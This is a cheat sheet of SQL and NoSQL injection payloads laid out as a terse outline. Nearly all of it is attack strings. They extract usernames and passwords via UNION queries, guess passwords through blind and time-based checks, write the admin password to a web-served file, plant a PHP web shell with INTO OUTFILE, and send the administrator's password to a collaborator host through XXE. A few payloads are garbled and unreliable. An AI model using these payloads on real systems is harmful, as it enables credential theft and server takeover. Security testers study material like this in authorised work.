SQL Injection Techniques
-
Introduction
- One of the most devastating server-side bugs.
- Nowadays, you won't find it using a simple
'OR 1=1--payload, but there are some tricks to still find it. - Before understanding SQLi, you should know the basics of SQL. Here's a quick SQL refresher: SQL Basics.
-
Testing with Injection Strings
- Test by injecting strings like:
', -, /, ', :, ;
- Test by injecting strings like:
-
Extracting User ID
- SQL Query:
SELECT Id FROM Users WHERE Username='you' AND Password='password123';
- SQL Query:
-
Altering Database Records
- SQL Query:
UPDATE Users SET Password='password12345' WHERE Id = 2;
- SQL Query:
-
Second Order SQLi
- SQL Query:
username="john_Cena' UNION SELECT Username, Password FROM Users;-- "&password=password123
- SQL Query:
-
Classic SQLi (Rare Nowadays)
- SQL Query:
SELECT Title, Body FROM Emails WHERE Username='kane' AND AccessKey='ZB6w0YLjzvAVmp6zvr' UNION SELECT Username, Password FROM Users;--
- SQL Query:
-
Blind SQLi
- You might use a webserver to get your responses too.
- SQL Query:
SELECT * FROM PremiumUsers WHERE Id='2' UNION SELECT Id FROM Users WHERE Username = 'admin' and 1 SUBSTR(Password, 1, 1) = 'a';--
-
Time-Based SQLi
- SQL Query:
sleep(5) 2' UNION SELECT IF(SUBSTR(Password, 1, 1) = 'a', SLEEP(10), 0) Password FROM Users WHERE Username = 'admin';
- SQL Query:
-
Exfiltrating Data using SQLi
- SQL Query:
SELECT Password FROM Users WHERE Username='admin' INTO OUTFILE '/var/www/html/output.txt'
- Now, fire up the file in the URL and view.
- SQL Query:
-
NoSQL Injection (MongoDB)
- Some example queries for NoSQL injection:
Users.find({username: 'vickie', password: 'password123'}); Users.find({username: $username, password: $password}); Users.find( { $where: function() { return (this.username == 'ohyea'; while(true){};) } } ); Users.find( { $where: function() { return (this.username == $user_input) } } );
- Some example queries for NoSQL injection:
-
Automate with NoSQLMap
-
Learning About the Database
- SQL Query:
SELECT Title, Body FROM Emails WHERE Username='vickie' UNION SELECT 1, @@version;--
- SQL Query:
-
Common Commands for Querying the Version
- Some common version queries:
@@versionfor Microsoft SQL Server and MySQL.version()for PostgreSQL.v$versionfor Oracle.
- Some common version queries:
-
Time-Based Database Version
- SQL Query:
SELECT * FROM PremiumUsers WHERE Id='2' UNION SELECT IF(SUBSTR(@@version, 1, 1) = '1', SLEEP(10), 0); --
- SQL Query:
-
Gaining a Web Shell
- SQL Query:
SELECT Password FROM Users WHERE Username='abc' UNION SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"
- SQL Query:
-
XML Injection
- SQL Query:
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
- SQL Query:
-
Hex Entities
- SQL Query:
<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>